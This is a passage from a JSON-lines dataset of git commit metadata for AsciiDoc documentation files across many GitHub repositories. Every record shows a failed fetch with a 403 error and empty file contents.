papers\/Quick Notes on papers\/Notes TPD HREELS of GUA on Zn Pt(111).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mannyfin\/IRAS.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d778437ceab106ad8ec82ad0cde7f928334cbb87","subject":"- Added README.asciidoc","message":"- Added README.asciidoc\n","repos":"semkr\/workshops,semkr\/workshops,davidkirwan\/workshops,davidkirwan\/workshops","old_file":"IoT_WIT\/README.asciidoc","new_file":"IoT_WIT\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidkirwan\/workshops.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fe199f1b3fd8752960a2aded518fbdb0e7da237","subject":"Add documentation for the integration of ES pagination fixes Issue #179 (#351)","message":"Add documentation for the integration of ES pagination fixes Issue #179 (#351)\n\n* url-encoding only on query values #345\r\n* add documentation to use pagination with ES fixes #179\r\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"docs\/elasticsearch.adoc","new_file":"docs\/elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65dd61490753b9224718bb7997e5ead425bda1ec","subject":"Update 2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","message":"Update 
2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","new_file":"_posts\/2017-01-10-Pancake-C-M-S-A-new-approach-to-C-M-S-using-web-components-and-server-less-architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eafed97e0dc8bc6ce9c682c94f5010ec99dad6a6","subject":"Renamed '_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc' to '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc'","message":"Renamed '_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc' to '_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_file":"_posts\/2018-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42be388e9ae9e4b5d1a182d153036e501cbfe155","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbcae5b07035b1b4558320b0e1d17e91c1714013","subject":"Update dbm-clear-checksums.adoc","message":"Update dbm-clear-checksums.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-clear-checksums.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-clear-checksums.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"233826b626d90992d3dff09a0877d88c3d70e851","subject":"Update 2015-07-22-DDR-Dance-Dance-Robots.adoc","message":"Update 2015-07-22-DDR-Dance-Dance-Robots.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-22-DDR-Dance-Dance-Robots.adoc","new_file":"_posts\/2015-07-22-DDR-Dance-Dance-Robots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc13dd147f55fea8b3f7df24a1bb04a6b186cb11","subject":"Update 2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","message":"Update 2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","new_file":"_posts\/2016-11-09-Google-Yelp-or-how-Google-Local-Guides-just-became-more-relevant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf616fcabfa5efab38056b7c02c38919775cd197","subject":"Update 2017-05-26-Learning-Deep-Learning.adoc","message":"Update 2017-05-26-Learning-Deep-Learning.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-26-Learning-Deep-Learning.adoc","new_file":"_posts\/2017-05-26-Learning-Deep-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66ef51d5b1f1b0a1e0c6a237b60e982b5bddd249","subject":"Added gitter badge","message":"Added gitter badge","repos":"GYMY-16\/gymybook,GYMY-16\/gymybook","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/gymybook.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5641f920b0eef39957a1f3fa3ddf8e293a844ad4","subject":"Readme: remove duplicated entry","message":"Readme: remove duplicated entry\n\n(hawkular-alerts-bus-api)","repos":"hawkular\/hawkular-alerts,jpkrohling\/hawkular-alerts,jsanda\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,jsanda\/hawkular-alerts,lucasponce\/hawkular-alerts,hawkular\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec2a41547af8c4b9bea93ff98e962339fe245d36","subject":"Added readme","message":"Added readme\n","repos":"aroq\/drubone,aroq\/drubone","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aroq\/drubone.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae456962a780a87c6281f903f20323efb913aa00","subject":"replacing tabs and adding a README","message":"replacing tabs and adding a 
README\n","repos":"rmannibucau\/boon-jaxrs-provider","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmannibucau\/boon-jaxrs-provider.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b7c0063bf846e5b4f425c496701297b577e372b","subject":"docs: Fix perf links","message":"docs: Fix perf links\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e662be717569402e5509c3ad48bb5e17e9c392a6","subject":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","message":"Update 2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_file":"_posts\/2015-09-14-I-found-it-diffcult-to-order-in-a-restaurant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3258dd17ae77f30ef373e303f9ba5148fcb70fc","subject":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46d0fea0ca12dcf07a21b5df5250555ecbf11264","subject":"Create FP.adoc","message":"Create FP.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"FP.adoc","new_file":"FP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"6bcadaf593ca7f12f83bc5009d996bef520ce492","subject":"common-training snippet","message":"common-training snippet","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-training.adoc","new_file":"src\/main\/docs\/common-training.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bd6c520a9f1d3e1ae085bbc8f1e57f87f491fcc","subject":"Update 2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","message":"Update 
2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5004e8d05e6ee4379d679c2e110c663832b88cbc","subject":"Update 2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","message":"Update 2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","new_file":"_posts\/2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb77302be4a4b02385613a67abe27e7e14fb870","subject":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cda07be91bdb9ea537dc19768db54fd345ce7bf0","subject":"release notes: update_dirs and fs_metadata_dir","message":"release notes: update_dirs and fs_metadata_dir\n\nThis patch adds release notes for support of data dir removal via the\n`kudu fs update_dirs` tool and for the configuration of the metadata\ndirectory.\n\nNote: These blurbs are taken from the configuration docs.\n\nChange-Id: I87f0857c3e7d9d98865fbb50e5e69b78e03c6fe2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9581\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested 
URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7093392cd30ed03babb0ee5a6e009ef912b4f6a6","subject":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4664e7ddebd72d9c8cdadd0a7de1bb6468a16160","subject":"Update 2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","message":"Update 2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","new_file":"_posts\/2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32010405f052497a1d7bfa73b5ef03ce99ce50e3","subject":"Adds README.adoc","message":"Adds README.adoc\n\nAdds README.adoc with information on how to use Arquillian Cube.","repos":"spolti\/arquillian-cube,spolti\/arquillian-cube,AndyGee\/arquillian-cube,AndyGee\/arquillian-cube,lordofthejars\/arquillian-cube,mikesir87\/arquillian-cube,AndyGee\/arquillian-cube,mikesir87\/arquillian-cube,lordofthejars\/arquillian-cube,mikesir87\/arquillian-cube,lordofthejars\/arquillian-cube,spolti\/arquillian-cube","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spolti\/arquillian-cube.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d78415bb34d35f009e1f5bbafbc00c6b10824c13","subject":"Update README","message":"Update README\n\nAdd a reference to hachoir.\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"3c6ea9928e54f764d4026cf8456edb78b43a5af6","subject":"docs: Fix gitter link","message":"docs: Fix gitter link\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"837f92995a1ea95d6319d9b5c1d472ed0528b3c9","subject":"Add readme","message":"Add readme\n","repos":"snoopee\/snoopee.github.io,snoopee\/snoopee.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snoopee\/snoopee.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76cd5781f1c3c9c7837c72ed8a71e6fac79be7a3","subject":"job: #12050 added implementation note","message":"job: #12050 added implementation note\n","repos":"cortlandstarrett\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,leviathan747\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc","old_file":"doc\/notes\/11444_wasl\/12050_type_order_int.adoc","new_file":"doc\/notes\/11444_wasl\/12050_type_order_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6410d9c7915d64c6f0a862ed921cca16bb836673","subject":"[#18103] Add guide for Hibernate Reactive","message":"[#18103] Add guide for Hibernate Reactive\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-reactive.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-reactive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32e6fcf2568ac800fa692b4b54217e63d4b81b50","subject":"Fix markup in Zen discovery docs","message":"Fix markup in Zen discovery docs\n\nThis commit fixes a markup issue in the Zen discovery docs where a link\nand its referring text were not on the same line tripping the 
renderer.\n","repos":"brandonkearby\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,strapdata\/elassandra,C-Bish\/elasticsearch,i-am-Nathan\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,robin13\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,mortonsykes\/elasticsearch,i-am-Nathan\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,IanvsPoplicola\/elasticsearch,henakamaMSFT\/elasticsearch,geidies\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,JackyMai\/elasticsearch,wuranbo\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,qwerty4030\/elasticsearch,JSCooke\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,spiegela\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,C-Bish\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,kalimatas\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,brandonkearby\/elasticsearch,fernandozhu\/elasticsearch,mjason3\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,elasticdog\/elasticsearch,obourgain\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,IanvsPoplicola\/elasticsearch,alexshadow007\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,brandonkearby\/elasticsearch,MaineC\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,spiegela\/elasticsearch,njlawton\/elasticsearch,i-am-Nathan\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,henakamaMSFT\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,MisterAndersen\/elasticsearch,lks21c\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,mjason3\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,Helen-Zhao\/elasticsearch,wuranbo\/elasticsearch,wuranbo\/elasticsearch,GlenRSmith\/ela
sticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,MisterAndersen\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,henakamaMSFT\/elasticsearch,naveenhooda2000\/elasticsearch,IanvsPoplicola\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,IanvsPoplicola\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,MaineC\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,vroyer\/elasticassandra,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,rajanm\/elasticsearch,obourgain\/elasticsearch,artnowo\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,jprante\/elasticsearch,rlugojr\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,StefanGor\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,spiegela\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,glefloch\/elasticsearch,vroyer\/elassandra,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,gfyoung\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,a2lin\/elasticsearch,mikemccand\/elasticsearch,nezirus\/elasticsearch,nazarewk\/elasticsearch,shreejay\/elasticsearch,Shepard1212\/elasticsearch,elasticdog\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,MaineC\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin